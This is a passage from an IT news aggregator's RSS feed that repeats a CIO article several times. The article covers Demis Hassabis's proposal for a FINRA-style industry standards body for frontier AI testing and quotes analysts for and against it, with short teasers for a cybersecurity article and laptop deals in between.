<p class="wp-block-paragraph">He added, “an exclusive US standard that is not globally respected or enforceable would likely fail to achieve its core purpose and would place US companies at a competitive disadvantage.”</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/akm76/" target="_blank" rel="noreferrer noopener">Aman Mahapatra</a>, chief strategy officer for Tribeca Softtech, a New York City-based technology consulting firm, said that a deep dive into how <a href="https://www.finra.org/" target="_blank" rel="noreferrer noopener">FINRA</a> operates today is illustrative of what IT leaders can expect from this effort, assuming the industry adopts that model.</p>



<p class="wp-block-paragraph">“When the CEOs of the five companies that would be regulated are also the primary drafters of the standards, the standards will reflect those companies’ interests. FINRA has an independent board, but the operational reality is that member firm perspectives dominate the working groups that write the actual rules,” he said. “There is no reason to expect an AI equivalent to work differently, and every reason to expect it to work worse, because AI standardization is happening faster than any industry has ever attempted to standardize itself, and speed is the enemy of independent oversight.”</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/carmi/" target="_blank" rel="noreferrer noopener">Carmi Levy</a>, an independent technology analyst, was even more emphatically opposed to the Hassabis proposal.</p>



<p class="wp-block-paragraph">“Asking Big Tech companies to self-police is analogous to allowing foxes to guard the henhouse. It hasn’t worked to date, and it won’t work going forward. Expecting these organizations to somehow change their ways at this point in time represents the height of naïve thinking,” Levy said. “The framework proposed by Demis Hassabis is a self-serving roadmap for an industry bent on racing to the AI horizon regardless of the harms caused along the way. It is impossible to quantify the dangers to broader society should frameworks allowing self-regulation become the norm.”</p>



<h2 class="wp-block-heading">Some love the proposal</h2>



<p class="wp-block-paragraph">An almost completely opposite stance came from <a href="https://www.linkedin.com/in/yurigoryunov/" target="_blank" rel="noreferrer noopener">Yuri Goryunov</a>, CIO of consulting firm Acceligence, who applauded the proposed move.</p>



<p class="wp-block-paragraph">“This is one of the rare setups where industry self-regulation has a real shot, and enterprise IT should be enthusiastically rooting for it,” he said. “It fails when harms are externalized, such as in social media content moderation. Or when the overseer outsources judgment to the overseen, such as the FAA’s delegation to Boeing before the 737 MAX. It works when everyone in the industry shares the catastrophic downside.”</p>



<p class="wp-block-paragraph">He suggested, however, that the best precedent here isn’t FINRA, it’s INPO, the Institute of Nuclear Power Operations, which the nuclear industry created within months of the <a href="https://www.nrc.gov/reading-rm/doc-collections/fact-sheets/3mile-isle" target="_blank" rel="noreferrer noopener">1979 Three Mile Island partial reactor meltdown</a> “on the logic that an accident anywhere is an accident everywhere. INPO peer-reviews every US plant, its evaluations move insurance premiums, and it sits on top of the NRC’s statutory floor. That is a public-private stack very close to what Hassabis is describing. Frontier AI has the same structure: one lab’s catastrophic failure brings regulation down on all of them.”</p>



<p class="wp-block-paragraph">For enterprise CIOs and other IT executives, Goryunov said, that model has the potential for being a big win.</p>



<p class="wp-block-paragraph"><strong>“</strong>Today, every enterprise duplicates the same AI diligence of red-teaming, eval suites, governance committees and each does so with less information than any certifying body would have,” Goryunov said. “A credible standards regime does for AI what UL did for electrical equipment and SOC2 did for cloud: it converts an unknowable risk into a procurable product and gives boards a defensible standard of care. That’s not red tape. That’s peace of mind with an audit trail.”</p>



<p class="wp-block-paragraph">However, Mahapatra said, “the countervailing view is that the alternative to industry-led standards is probably not thoughtful legislation. It is probably no standards, or state-by-state fragmentation, or the current pattern of ex-post enforcement actions where regulators surface concerns years after harm has already occurred.” </p>



<p class="wp-block-paragraph">Thus, he noted, “Hassabis is making the reasonable argument that imperfect fast standards are better than perfect slow ones, and there is genuine merit to that view for topics like agent identity, evaluation methodology, and interoperability, which are exactly the areas <a href="https://www.computerworld.com/article/4196365/openclaw-becomes-a-nonprofit-foundation-as-it-seeks-to-be-the-switzerland-of-ai.html" target="_blank">OpenClaw is also targeting</a>.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[DeepMind CEO pushes for AI industry self-regulation]]></title>
<description><![CDATA[Google DeepMind CEO Demis Hassabis is pushing for the US AI industry to self-regulate, with the support of government, as a starting point for an international creating shared international standards. In a blog post, he called for a focus on artificial general intelligence (AGI) and national secu...]]></description>
<link>https://tsecurity.de/de/3673451/it-nachrichten/deepmind-ceo-pushes-for-ai-industry-self-regulation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673451/it-nachrichten/deepmind-ceo-pushes-for-ai-industry-self-regulation/</guid>
<pubDate>Thu, 16 Jul 2026 14:33:34 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Google DeepMind CEO Demis Hassabis is pushing for the US AI industry to self-regulate, with the support of government, as a starting point for an international creating shared international standards. In a blog post, he called for a focus on <a href="https://www.computerworld.com/article/4174181/google-talks-singularity-while-scaling-up-agentic-ai-for-enterprises-2.html">artificial general intelligence (AGI)</a> and national security. </p>



<p class="wp-block-paragraph">But it is precisely that focus on national security that may make the results of such an effort, assuming it happens, less than palatable outside of the US.</p>



<p class="wp-block-paragraph">“The rapid progress we’re seeing in AI requires a new approach to testing frontier AI model capabilities that is dynamic, adaptable, and rigorous,” <a href="https://demishassabis.substack.com/p/a-framework-for-frontier-ai-and-the-dawning-of-a-new-age" target="_blank" rel="noreferrer noopener">Hassabis wrote</a>. “The US is well positioned, given its economic and technical standing, to take the first step in developing such a framework. It could establish a new Standards Body modelled on a federally overseen public-private partnership or self-regulatory organization, much like the Financial Industry Regulatory Authority (FINRA), with a board that includes independent leading technical experts and open-source representatives.”</p>



<p class="wp-block-paragraph">He noted, however, that the funding would need to be substantial, and would most likely come from industry, to allow the new body to attract world-class technical talent and obtain the necessary compute resources for large-scale testing.</p>



<p class="wp-block-paragraph">Hassabis proposed that the organization “be responsible for developing assessment protocols and working with appropriate federal agencies and the US National Labs to conduct testing in areas relevant to national security,” and that AI vendor participants be encouraged to adopt best practices such as publishing model cards with technical details, maintaining strong internal cybersecurity, vetting key personnel, and providing sufficient resourcing for safety and security research.</p>



<p class="wp-block-paragraph">This is not the first time Hassabis has <a href="https://www.computerworld.com/article/4178398/deepmind-ceo-agi-could-be-here-in-three-years.html" target="_blank">expressed worries about AGI</a>. </p>



<p class="wp-block-paragraph">DeepMind was involved in an earlier <a href="https://www.cio.com/article/4168122/us-government-agency-to-safety-test-frontier-ai-models-before-release.html" target="_blank">US government initiative evaluating AI safety</a>, alongside Microsoft and xAI (now SpaceXAI) working with the Center for AI Standards and Innovation (CAISI), a division of the US Department of Commerce. It allowed CAISI to conduct pre-deployment evaluations and targeted research to “better assess frontier AI capabilities and advance the state of AI security.”  </p>



<h2 class="wp-block-heading">The rest of the world may have concerns</h2>



<p class="wp-block-paragraph">Analysts and consultants were mixed about the move, with most expressing concerns about whether an industry-focused group would prioritize the public’s best interests.</p>



<p class="wp-block-paragraph">“Self-regulation is not viable because it implies everyone is able to regulate themselves and will do so in line with the best interests of the public. Most tech vendors don’t have the capacity to self-regulate. They would just prefer a set of rules within which they can operate,” said Gartner VP analyst <a href="https://www.gartner.com/en/experts/nader-henein" target="_blank" rel="noreferrer noopener">Nader Henein</a>. “For-profit organizations are required to do what is best for their shareholders, and external regulation ensures that those organizations are never in a conflict of interest where they have to choose between what is good for their shareholders and what is good for the public.”</p>



<p class="wp-block-paragraph">And, said <a href="https://greyhoundresearch.com/svg/" target="_blank" rel="noreferrer noopener">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research, given the international nature of AI models, an effort coordinated by the US government might alienate other countries. </p>



<p class="wp-block-paragraph">“National security is the proposal’s accelerator in Washington and its poison pill abroad: the framing that opens the only gate available at home invites foreign capitals to read the institution as an instrument of American strategy,” he pointed out. </p>



<p class="wp-block-paragraph">“The map is already plural,” he said. “Brussels switches on enforcement powers over general-purpose models [starting in August 2026], London runs the AI Security Institute, and Beijing licenses on its own terms. California and New York have legislated for frontier models at home. The durable route is shared technical evidence with sovereign enforcement, sealed through mutual recognition rather than deference, with India and the other major non-Western markets holding authorship rather than seats.”</p>



<p class="wp-block-paragraph">Gogia added that the rules enacted by even such a group may not address all of the key concerns of enterprise IT. A US government effort along the lines that Hassabis is proposing would result in testing that “sits close to intelligence and industrial policy, and those functions will not stay neatly separated. A model can pass every catastrophic-risk test and still fail the enterprise on privacy, reliability, and liability,” he noted.</p>



<p class="wp-block-paragraph">Walmart’s former director of cybersecurity <a href="https://www.linkedin.com/in/steveneric/" target="_blank" rel="noreferrer noopener">Steven Eric Fisher</a>, who is now an independent cybersecurity consultant, said he found the proposal “well-intentioned, but it addresses a highly polarized topic at a time when commercial interests carry unprecedented political influence, which is not always applied benevolently.”</p>



<p class="wp-block-paragraph">He added, “an exclusive US standard that is not globally respected or enforceable would likely fail to achieve its core purpose and would place US companies at a competitive disadvantage.”</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/akm76/" target="_blank" rel="noreferrer noopener">Aman Mahapatra</a>, chief strategy officer for Tribeca Softtech, a New York City-based technology consulting firm, said that a deep dive into how <a href="https://www.finra.org/" target="_blank" rel="noreferrer noopener">FINRA</a> operates today is illustrative of what IT leaders can expect from this effort, assuming the industry adopts that model.</p>



<p class="wp-block-paragraph">“When the CEOs of the five companies that would be regulated are also the primary drafters of the standards, the standards will reflect those companies’ interests. FINRA has an independent board, but the operational reality is that member firm perspectives dominate the working groups that write the actual rules,” he said. “There is no reason to expect an AI equivalent to work differently, and every reason to expect it to work worse, because AI standardization is happening faster than any industry has ever attempted to standardize itself, and speed is the enemy of independent oversight.”</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/carmi/" target="_blank" rel="noreferrer noopener">Carmi Levy</a>, an independent technology analyst, was even more emphatically opposed to the Hassabis proposal.</p>



<p class="wp-block-paragraph">“Asking Big Tech companies to self-police is analogous to allowing foxes to guard the henhouse. It hasn’t worked to date, and it won’t work going forward. Expecting these organizations to somehow change their ways at this point in time represents the height of naïve thinking,” Levy said. “The framework proposed by Demis Hassabis is a self-serving roadmap for an industry bent on racing to the AI horizon regardless of the harms caused along the way. It is impossible to quantify the dangers to broader society should frameworks allowing self-regulation become the norm.”</p>



<h2 class="wp-block-heading">Some love the proposal</h2>



<p class="wp-block-paragraph">An almost completely opposite stance came from <a href="https://www.linkedin.com/in/yurigoryunov/" target="_blank" rel="noreferrer noopener">Yuri Goryunov</a>, CIO of consulting firm Acceligence, who applauded the proposed move.</p>



<p class="wp-block-paragraph">“This is one of the rare setups where industry self-regulation has a real shot, and enterprise IT should be enthusiastically rooting for it,” he said. “It fails when harms are externalized, such as in social media content moderation. Or when the overseer outsources judgment to the overseen, such as the FAA’s delegation to Boeing before the 737 MAX. It works when everyone in the industry shares the catastrophic downside.”</p>



<p class="wp-block-paragraph">He suggested, however, that the best precedent here isn’t FINRA, it’s INPO, the Institute of Nuclear Power Operations, which the nuclear industry created within months of the <a href="https://www.nrc.gov/reading-rm/doc-collections/fact-sheets/3mile-isle" target="_blank" rel="noreferrer noopener">1979 Three Mile Island partial reactor meltdown</a> “on the logic that an accident anywhere is an accident everywhere. INPO peer-reviews every US plant, its evaluations move insurance premiums, and it sits on top of the NRC’s statutory floor. That is a public-private stack very close to what Hassabis is describing. Frontier AI has the same structure: one lab’s catastrophic failure brings regulation down on all of them.”</p>



<p class="wp-block-paragraph">For enterprise CIOs and other IT executives, Goryunov said, that model has the potential for being a big win.</p>



<p class="wp-block-paragraph"><strong>“</strong>Today, every enterprise duplicates the same AI diligence of red-teaming, eval suites, governance committees and each does so with less information than any certifying body would have,” Goryunov said. “A credible standards regime does for AI what UL did for electrical equipment and SOC2 did for cloud: it converts an unknowable risk into a procurable product and gives boards a defensible standard of care. That’s not red tape. That’s peace of mind with an audit trail.”</p>



<p class="wp-block-paragraph">However, Mahapatra said, “the countervailing view is that the alternative to industry-led standards is probably not thoughtful legislation. It is probably no standards, or state-by-state fragmentation, or the current pattern of ex-post enforcement actions where regulators surface concerns years after harm has already occurred.” </p>



<p class="wp-block-paragraph">Thus, he noted, “Hassabis is making the reasonable argument that imperfect fast standards are better than perfect slow ones, and there is genuine merit to that view for topics like agent identity, evaluation methodology, and interoperability, which are exactly the areas <a href="https://www.computerworld.com/article/4196365/openclaw-becomes-a-nonprofit-foundation-as-it-seeks-to-be-the-switzerland-of-ai.html" target="_blank">OpenClaw is also targeting</a>.”</p>



<p class="wp-block-paragraph"><em>This article first appeared on <a href="https://www.cio.com/article/4197497/deepmind-ceo-pushes-for-ai-industry-self-regulation.html">CIO</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[See It Once, Stop It Everywhere]]></title>
<description><![CDATA[In cybersecurity, no one can see everything all the time. Having robust information-sharing partners enables everyone to play to their strengths while augmenting their capabilities through the exchange of information with their...
The post See It Once, Stop It Everywhere appeared first on Cyber D...]]></description>
<link>https://tsecurity.de/de/3673329/it-security-nachrichten/see-it-once-stop-it-everywhere/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673329/it-security-nachrichten/see-it-once-stop-it-everywhere/</guid>
<pubDate>Thu, 16 Jul 2026 13:53:12 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img width="1024" height="768" src="https://www.cyberdefensemagazine.com/wp-content/uploads/2026/07/See-It-Once-Stop-It-Everywhere.png.jpg" class="webfeedsFeaturedVisual wp-post-image" alt="" link_thumbnail="" decoding="async" loading="lazy" srcset="https://www.cyberdefensemagazine.com/wp-content/uploads/2026/07/See-It-Once-Stop-It-Everywhere.png.jpg 1024w, https://www.cyberdefensemagazine.com/wp-content/uploads/2026/07/See-It-Once-Stop-It-Everywhere.png-768x576.jpg 768w" sizes="auto, (max-width: 1024px) 100vw, 1024px"><p>In cybersecurity, no one can see everything all the time. Having robust information-sharing partners enables everyone to play to their strengths while augmenting their capabilities through the exchange of information with their...</p>
<p>The post <a href="https://www.cyberdefensemagazine.com/see-it-once-stop-it-everywhere/" data-wpel-link="internal">See It Once, Stop It Everywhere</a> appeared first on <a href="https://www.cyberdefensemagazine.com/" data-wpel-link="internal">Cyber Defense Magazine</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Best business laptop deals 2026 — Top picks from HP, Asus, Dell, starting at $548]]></title>
<description><![CDATA[I searched everywhere I could to find the biggest savings on laptops for work, whether you're in the office or WFH.]]></description>
<link>https://tsecurity.de/de/3673101/it-nachrichten/best-business-laptop-deals-2026-top-picks-from-hp-asus-dell-starting-at-548/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673101/it-nachrichten/best-business-laptop-deals-2026-top-picks-from-hp-asus-dell-starting-at-548/</guid>
<pubDate>Thu, 16 Jul 2026 12:32:03 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[I searched everywhere I could to find the biggest savings on laptops for work, whether you're in the office or WFH.]]></content:encoded>
</item>
<item>
<title><![CDATA[DeepMind CEO again pushes for a frontier AI standards body]]></title>
<description><![CDATA[Google DeepMind CEO Demis Hassabis on Tuesday reiterated his push for an AI industry self-regulation effort, led by the US government, that is particularly focused on artificial general intelligence (AGI) and national security. 



But it is precisely that focus on national security that may make...]]></description>
<link>https://tsecurity.de/de/3671860/it-nachrichten/deepmind-ceo-again-pushes-for-a-frontier-ai-standards-body/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671860/it-nachrichten/deepmind-ceo-again-pushes-for-a-frontier-ai-standards-body/</guid>
<pubDate>Wed, 15 Jul 2026 23:01:43 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Google DeepMind CEO Demis Hassabis on Tuesday reiterated his push for an AI industry self-regulation effort, led by the US government, that is particularly focused on <a href="https://www.computerworld.com/article/4174181/google-talks-singularity-while-scaling-up-agentic-ai-for-enterprises-2.html" target="_blank">artificial general intelligence (AGI)</a> and national security. </p>



<p class="wp-block-paragraph">But it is precisely that focus on national security that may make the results of such an effort, assuming it happens, less than palatable outside of the US.</p>



<p class="wp-block-paragraph">“The rapid progress we’re seeing in AI requires a new approach to testing frontier AI model capabilities that is dynamic, adaptable, and rigorous,” <a href="https://demishassabis.substack.com/p/a-framework-for-frontier-ai-and-the-dawning-of-a-new-age" target="_blank" rel="noreferrer noopener">Hassabis wrote</a>. “The US is well positioned, given its economic and technical standing, to take the first step in developing such a framework. It could establish a new Standards Body modelled on a federally overseen public-private partnership or self-regulatory organization, much like the Financial Industry Regulatory Authority (FINRA), with a board that includes independent leading technical experts and open-source representatives.”</p>



<p class="wp-block-paragraph">He noted, however, that the funding would need to be substantial, and would most likely come from industry, to allow the new body to attract world-class technical talent and obtain the necessary compute resources for large-scale testing.</p>



<p class="wp-block-paragraph">Hassabis said he would propose that the organization “be responsible for developing assessment protocols and working with appropriate federal agencies and the US National Labs to conduct testing in areas relevant to national security,” and that AI vendor participants would be encouraged to adopt best practices, such as publishing model cards with technical details, maintaining strong internal cybersecurity, vetting key personnel, and providing sufficient resourcing for safety and security research.</p>



<p class="wp-block-paragraph">This is not the first time Hassabis has <a href="https://www.computerworld.com/article/4178398/deepmind-ceo-agi-could-be-here-in-three-years.html" target="_blank">expressed worries about AGI</a>. He has already worked on <a href="https://www.cio.com/article/4168122/us-government-agency-to-safety-test-frontier-ai-models-before-release.html" target="_blank">a US government initiative evaluating AI safety</a>, which involved DeepMind, Microsoft and xAI (now SpaceXAI) working with the Center for AI Standards and Innovation (CAISI), a division of the US Department of Commerce. It allowed CAISI to conduct pre-deployment evaluations and targeted research to “better assess frontier AI capabilities and advance the state of AI security.”  </p>



<h2 class="wp-block-heading">The rest of the world may have concerns</h2>



<p class="wp-block-paragraph">Analysts and consultants were mixed about the move, with most expressing concerns about whether an industry-focused group would prioritize the public’s best interests.</p>



<p class="wp-block-paragraph">“Self-regulation is not viable because it implies everyone is able to regulate themselves and will do so in line with the best interests of the public. Most tech vendors don’t have the capacity to self-regulate. They would just prefer a set of rules within which they can operate,” said Gartner VP analyst <a href="https://www.gartner.com/en/experts/nader-henein" target="_blank" rel="noreferrer noopener">Nader Henein</a>. “For-profit organizations are required to do what is best for their shareholders, and external regulation ensures that those organizations are never in a conflict of interest where they have to choose between what is good for their shareholders and what is good for the public.”</p>



<p class="wp-block-paragraph">And, said <a href="https://greyhoundresearch.com/svg/" target="_blank" rel="noreferrer noopener">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research, given the international nature of AI models, an effort coordinated by the US government might alienate other countries. </p>



<p class="wp-block-paragraph">“National security is the proposal’s accelerator in Washington and its poison pill abroad: the framing that opens the only gate available at home invites foreign capitals to read the institution as an instrument of American strategy,” he pointed out. </p>



<p class="wp-block-paragraph">“The map is already plural,” he said. “Brussels switches on enforcement powers over general-purpose models [starting in August 2026], London runs the AI Security Institute, and Beijing licenses on its own terms. California and New York have legislated for frontier models at home. The durable route is shared technical evidence with sovereign enforcement, sealed through mutual recognition rather than deference, with India and the other major non-Western markets holding authorship rather than seats.”</p>



<p class="wp-block-paragraph">Gogia added that the rules enacted by even such a group may not address all of the key concerns of enterprise IT. A US government effort along the lines that Hassabis is proposing would result in testing that “sits close to intelligence and industrial policy, and those functions will not stay neatly separated. A model can pass every catastrophic-risk test and still fail the enterprise on privacy, reliability, and liability,” he noted.</p>



<p class="wp-block-paragraph">Walmart’s former director of cybersecurity <a href="https://www.linkedin.com/in/steveneric/" target="_blank" rel="noreferrer noopener">Steven Eric Fisher</a>, who is now an independent cybersecurity consultant, said he found the proposal “well-intentioned, but it addresses a highly polarized topic at a time when commercial interests carry unprecedented political influence, which is not always applied benevolently.”</p>



<p class="wp-block-paragraph">He added, “an exclusive US standard that is not globally respected or enforceable would likely fail to achieve its core purpose and would place US companies at a competitive disadvantage.”</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/akm76/" target="_blank" rel="noreferrer noopener">Aman Mahapatra</a>, chief strategy officer for Tribeca Softtech, a New York City-based technology consulting firm, said that a deep dive into how <a href="https://www.finra.org/" target="_blank" rel="noreferrer noopener">FINRA</a> operates today is illustrative of what IT leaders can expect from this effort, assuming the industry adopts that model.</p>



<p class="wp-block-paragraph">“When the CEOs of the five companies that would be regulated are also the primary drafters of the standards, the standards will reflect those companies’ interests. FINRA has an independent board, but the operational reality is that member firm perspectives dominate the working groups that write the actual rules,” he said. “There is no reason to expect an AI equivalent to work differently, and every reason to expect it to work worse, because AI standardization is happening faster than any industry has ever attempted to standardize itself, and speed is the enemy of independent oversight.”</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/carmi/" target="_blank" rel="noreferrer noopener">Carmi Levy</a>, an independent technology analyst, was even more emphatically opposed to the Hassabis proposal.</p>



<p class="wp-block-paragraph">“Asking Big Tech companies to self-police is analogous to allowing foxes to guard the henhouse. It hasn’t worked to date, and it won’t work going forward. Expecting these organizations to somehow change their ways at this point in time represents the height of naïve thinking,” Levy said. “The framework proposed by Demis Hassabis is a self-serving roadmap for an industry bent on racing to the AI horizon regardless of the harms caused along the way. It is impossible to quantify the dangers to broader society should frameworks allowing self-regulation become the norm.”</p>



<h2 class="wp-block-heading">Some love the proposal</h2>



<p class="wp-block-paragraph">An almost completely opposite stance came from <a href="https://www.linkedin.com/in/yurigoryunov/" target="_blank" rel="noreferrer noopener">Yuri Goryunov</a>, CIO of consulting firm Acceligence, who applauded the proposed move.</p>



<p class="wp-block-paragraph">“This is one of the rare setups where industry self-regulation has a real shot, and enterprise IT should be enthusiastically rooting for it,” he said. “It fails when harms are externalized, such as in social media content moderation. Or when the overseer outsources judgment to the overseen, such as the FAA’s delegation to Boeing before the 737 MAX. It works when everyone in the industry shares the catastrophic downside.”</p>



<p class="wp-block-paragraph">He suggested, however, that the best precedent here isn’t FINRA, it’s INPO, the Institute of Nuclear Power Operations, which the nuclear industry created within months of the <a href="https://www.nrc.gov/reading-rm/doc-collections/fact-sheets/3mile-isle" target="_blank" rel="noreferrer noopener">1979 Three Mile Island partial reactor meltdown</a> “on the logic that an accident anywhere is an accident everywhere. INPO peer-reviews every US plant, its evaluations move insurance premiums, and it sits on top of the NRC’s statutory floor. That is a public-private stack very close to what Hassabis is describing. Frontier AI has the same structure: one lab’s catastrophic failure brings regulation down on all of them.”</p>



<p class="wp-block-paragraph">For enterprise CIOs and other IT executives, Goryunov said, that model has the potential for being a big win.</p>



<p class="wp-block-paragraph"><strong>“</strong>Today, every enterprise duplicates the same AI diligence of red-teaming, eval suites, governance committees and each does so with less information than any certifying body would have,” Goryunov said. “A credible standards regime does for AI what UL did for electrical equipment and SOC2 did for cloud: it converts an unknowable risk into a procurable product and gives boards a defensible standard of care. That’s not red tape. That’s peace of mind with an audit trail.”</p>



<p class="wp-block-paragraph">However, Mahapatra said, “the countervailing view is that the alternative to industry-led standards is probably not thoughtful legislation. It is probably no standards, or state-by-state fragmentation, or the current pattern of ex-post enforcement actions where regulators surface concerns years after harm has already occurred.” </p>



<p class="wp-block-paragraph">Thus, he noted, “Hassabis is making the reasonable argument that imperfect fast standards are better than perfect slow ones, and there is genuine merit to that view for topics like agent identity, evaluation methodology, and interoperability, which are exactly the areas <a href="https://www.computerworld.com/article/4196365/openclaw-becomes-a-nonprofit-foundation-as-it-seeks-to-be-the-switzerland-of-ai.html" target="_blank">OpenClaw is also targeting</a>.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[DeepMind CEO again pushes for a frontier AI standards body]]></title>
<description><![CDATA[Google DeepMind CEO Demis Hassabis on Tuesday reiterated his push for an AI industry self-regulation effort, led by the US government, that is particularly focused on artificial general intelligence (AGI) and national security. 



But it is precisely that focus on national security that may make...]]></description>
<link>https://tsecurity.de/de/3671859/it-nachrichten/deepmind-ceo-again-pushes-for-a-frontier-ai-standards-body/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671859/it-nachrichten/deepmind-ceo-again-pushes-for-a-frontier-ai-standards-body/</guid>
<pubDate>Wed, 15 Jul 2026 23:01:42 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Google DeepMind CEO Demis Hassabis on Tuesday reiterated his push for an AI industry self-regulation effort, led by the US government, that is particularly focused on <a href="https://www.computerworld.com/article/4174181/google-talks-singularity-while-scaling-up-agentic-ai-for-enterprises-2.html" target="_blank">artificial general intelligence (AGI)</a> and national security. </p>



<p class="wp-block-paragraph">But it is precisely that focus on national security that may make the results of such an effort, assuming it happens, less than palatable outside of the US.</p>



<p class="wp-block-paragraph">“The rapid progress we’re seeing in AI requires a new approach to testing frontier AI model capabilities that is dynamic, adaptable, and rigorous,” <a href="https://demishassabis.substack.com/p/a-framework-for-frontier-ai-and-the-dawning-of-a-new-age" target="_blank" rel="noreferrer noopener">Hassabis wrote</a>. “The US is well positioned, given its economic and technical standing, to take the first step in developing such a framework. It could establish a new Standards Body modelled on a federally overseen public-private partnership or self-regulatory organization, much like the Financial Industry Regulatory Authority (FINRA), with a board that includes independent leading technical experts and open-source representatives.”</p>



<p class="wp-block-paragraph">He noted, however, that the funding would need to be substantial, and would most likely come from industry, to allow the new body to attract world-class technical talent and obtain the necessary compute resources for large-scale testing.</p>



<p class="wp-block-paragraph">Hassabis said he would propose that the organization “be responsible for developing assessment protocols and working with appropriate federal agencies and the US National Labs to conduct testing in areas relevant to national security,” and that AI vendor participants would be encouraged to adopt best practices, such as publishing model cards with technical details, maintaining strong internal cybersecurity, vetting key personnel, and providing sufficient resourcing for safety and security research.</p>



<p class="wp-block-paragraph">This is not the first time Hassabis has <a href="https://www.computerworld.com/article/4178398/deepmind-ceo-agi-could-be-here-in-three-years.html" target="_blank">expressed worries about AGI</a>. He has already worked on <a href="https://www.cio.com/article/4168122/us-government-agency-to-safety-test-frontier-ai-models-before-release.html" target="_blank">a US government initiative evaluating AI safety</a>, which involved DeepMind, Microsoft and xAI (now SpaceXAI) working with the Center for AI Standards and Innovation (CAISI), a division of the US Department of Commerce. It allowed CAISI to conduct pre-deployment evaluations and targeted research to “better assess frontier AI capabilities and advance the state of AI security.”  </p>



<h2 class="wp-block-heading">The rest of the world may have concerns</h2>



<p class="wp-block-paragraph">Analysts and consultants were mixed about the move, with most expressing concerns about whether an industry-focused group would prioritize the public’s best interests.</p>



<p class="wp-block-paragraph">“Self-regulation is not viable because it implies everyone is able to regulate themselves and will do so in line with the best interests of the public. Most tech vendors don’t have the capacity to self-regulate. They would just prefer a set of rules within which they can operate,” said Gartner VP analyst <a href="https://www.gartner.com/en/experts/nader-henein" target="_blank" rel="noreferrer noopener">Nader Henein</a>. “For-profit organizations are required to do what is best for their shareholders, and external regulation ensures that those organizations are never in a conflict of interest where they have to choose between what is good for their shareholders and what is good for the public.”</p>



<p class="wp-block-paragraph">And, said <a href="https://greyhoundresearch.com/svg/" target="_blank" rel="noreferrer noopener">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research, given the international nature of AI models, an effort coordinated by the US government might alienate other countries. </p>



<p class="wp-block-paragraph">“National security is the proposal’s accelerator in Washington and its poison pill abroad: the framing that opens the only gate available at home invites foreign capitals to read the institution as an instrument of American strategy,” he pointed out. </p>



<p class="wp-block-paragraph">“The map is already plural,” he said. “Brussels switches on enforcement powers over general-purpose models [starting in August 2026], London runs the AI Security Institute, and Beijing licenses on its own terms. California and New York have legislated for frontier models at home. The durable route is shared technical evidence with sovereign enforcement, sealed through mutual recognition rather than deference, with India and the other major non-Western markets holding authorship rather than seats.”</p>



<p class="wp-block-paragraph">Gogia added that the rules enacted by even such a group may not address all of the key concerns of enterprise IT. A US government effort along the lines that Hassabis is proposing would result in testing that “sits close to intelligence and industrial policy, and those functions will not stay neatly separated. A model can pass every catastrophic-risk test and still fail the enterprise on privacy, reliability, and liability,” he noted.</p>



<p class="wp-block-paragraph">Walmart’s former director of cybersecurity <a href="https://www.linkedin.com/in/steveneric/" target="_blank" rel="noreferrer noopener">Steven Eric Fisher</a>, who is now an independent cybersecurity consultant, said he found the proposal “well-intentioned, but it addresses a highly polarized topic at a time when commercial interests carry unprecedented political influence, which is not always applied benevolently.”</p>



<p class="wp-block-paragraph">He added, “an exclusive US standard that is not globally respected or enforceable would likely fail to achieve its core purpose and would place US companies at a competitive disadvantage.”</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/akm76/" target="_blank" rel="noreferrer noopener">Aman Mahapatra</a>, chief strategy officer for Tribeca Softtech, a New York City-based technology consulting firm, said that a deep dive into how <a href="https://www.finra.org/" target="_blank" rel="noreferrer noopener">FINRA</a> operates today is illustrative of what IT leaders can expect from this effort, assuming the industry adopts that model.</p>



<p class="wp-block-paragraph">“When the CEOs of the five companies that would be regulated are also the primary drafters of the standards, the standards will reflect those companies’ interests. FINRA has an independent board, but the operational reality is that member firm perspectives dominate the working groups that write the actual rules,” he said. “There is no reason to expect an AI equivalent to work differently, and every reason to expect it to work worse, because AI standardization is happening faster than any industry has ever attempted to standardize itself, and speed is the enemy of independent oversight.”</p>



